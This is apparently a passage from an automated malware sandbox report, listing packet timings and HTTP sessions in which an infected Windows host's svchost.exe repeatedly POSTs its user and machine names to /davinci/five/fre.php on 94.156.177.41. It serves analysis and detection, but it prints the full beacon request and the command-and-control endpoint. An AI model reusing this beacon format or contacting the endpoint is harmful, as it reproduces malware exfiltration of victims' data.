                        Nov 29, 2024 07:37:44.704447031 CET804975694.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:44.704540014 CET4975680192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:44.706705093 CET4975680192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:44.826652050 CET804975694.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:44.826714993 CET4975680192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:44.946681976 CET804975694.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:46.112834930 CET804975694.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:46.112946033 CET804975694.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:46.112957954 CET4975680192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:46.113076925 CET4975680192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:46.232846022 CET804975694.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:46.257435083 CET4975780192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:46.377475977 CET804975794.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:46.377557039 CET4975780192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:46.379575968 CET4975780192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:46.499481916 CET804975794.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:46.499557018 CET4975780192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:46.619517088 CET804975794.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:47.963159084 CET804975794.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:47.963306904 CET804975794.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:47.963471889 CET4975780192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:47.963471889 CET4975780192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:48.083519936 CET804975794.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:48.101331949 CET4975880192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:48.221441031 CET804975894.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:48.224490881 CET4975880192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:48.226660967 CET4975880192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:48.346610069 CET804975894.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:48.348566055 CET4975880192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:48.468589067 CET804975894.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:49.835711956 CET804975894.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:49.835791111 CET804975894.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:49.835943937 CET4975880192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:49.835943937 CET4975880192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:49.955918074 CET804975894.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:50.011344910 CET4975980192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:50.131495953 CET804975994.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:50.131580114 CET4975980192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:50.133806944 CET4975980192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:50.253824949 CET804975994.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:50.256361008 CET4975980192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:50.376348972 CET804975994.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:54.778409958 CET804975994.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:54.778476954 CET804975994.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:54.778517008 CET4975980192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:54.778553963 CET4975980192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:54.898520947 CET804975994.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:54.928283930 CET4976080192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:55.048485994 CET804976094.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:55.048636913 CET4976080192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:55.053323030 CET4976080192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:55.174472094 CET804976094.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:55.174547911 CET4976080192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:55.294557095 CET804976094.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:56.550052881 CET804976094.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:56.550153017 CET4976080192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:56.550220013 CET804976094.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:56.550266981 CET4976080192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:56.670017958 CET804976094.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:56.695094109 CET4976380192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:56.816509962 CET804976394.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:56.816600084 CET4976380192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:56.818681002 CET4976380192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:56.938735962 CET804976394.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:56.938795090 CET4976380192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:57.058796883 CET804976394.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.419599056 CET804976394.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.419692993 CET4976380192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.419770956 CET804976394.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.419815063 CET4976380192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.539742947 CET804976394.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.570120096 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.690092087 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.690169096 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.692344904 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.812290907 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.812352896 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.932444096 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.700906992 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.701009035 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.701066017 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.701111078 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.821048975 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.836030960 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.956079960 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.956163883 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.958424091 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:01.078418016 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:01.082225084 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:01.202279091 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.367278099 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.367408037 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.367448092 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.367502928 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.487382889 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.513943911 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.633985996 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.634252071 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.636234045 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.756175041 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.758234978 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.878278017 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.200182915 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.200263023 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.200295925 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.200371981 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.320327044 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.335005045 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.455049992 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.455151081 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.457258940 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.577389002 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.577450991 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.697391033 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:05.909101963 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:05.909208059 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:05.909281969 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:05.909329891 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.029059887 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:06.061925888 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.182190895 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:06.183864117 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.186880112 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.307758093 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:06.307813883 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.427777052 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.784981966 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.785079002 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.785105944 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:07.785188913 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:07.905771017 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.935682058 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.055808067 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:08.055876017 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.058146954 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.178117990 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:08.178167105 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.298235893 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.701245070 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.701337099 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.701448917 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.701504946 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.821427107 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.833655119 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.954926014 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.958235979 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.960716963 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:13.080638885 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:13.081566095 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:13.201878071 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.378434896 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.378524065 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.378688097 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.378731966 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.498648882 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.522273064 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.642441988 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.642546892 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.644509077 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.764523983 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.764600992 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.884749889 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:36.587616920 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:36.587729931 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:36.587928057 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:36.707761049 CET804980694.156.177.41192.168.2.4

                        HTTP Request Dependency Graph

                        • 94.156.177.41

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44973094.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:00.088272095 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 176
                        Connection: close
                        Nov 29, 2024 07:37:00.208189011 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.rujones364339JONES-PCk0FDD42EE188E931437F4FBE2CjPT2d
                        Nov 29, 2024 07:37:01.743693113 CET185INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:01 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.44973194.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:02.009470940 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 176
                        Connection: close
                        Nov 29, 2024 07:37:02.129462957 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.rujones364339JONES-PC+0FDD42EE188E931437F4FBE2CQ9dCm
                        Nov 29, 2024 07:37:03.474642992 CET185INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:03 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.44973294.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:03.659991980 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:03.780451059 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:05.072637081 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:04 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.44973394.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:05.563555956 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:05.683691978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:07.366683006 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.44973494.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:07.678630114 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:07.798758030 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:10.975239038 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.44973594.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:11.243534088 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:11.363666058 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:12.885755062 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.44973694.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:13.148227930 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:13.268210888 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:14.639606953 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:14 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.44973894.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:14.899337053 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:15.019341946 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:16.454478979 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:16 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.44974094.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:16.725650072 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:16.845716000 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:21.364413977 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:21 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.44974494.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:21.630054951 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:21.749991894 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:23.076883078 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:22 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.44974694.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:23.348701000 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:23.468794107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:24.907257080 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:24 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.44974794.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:25.176871061 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
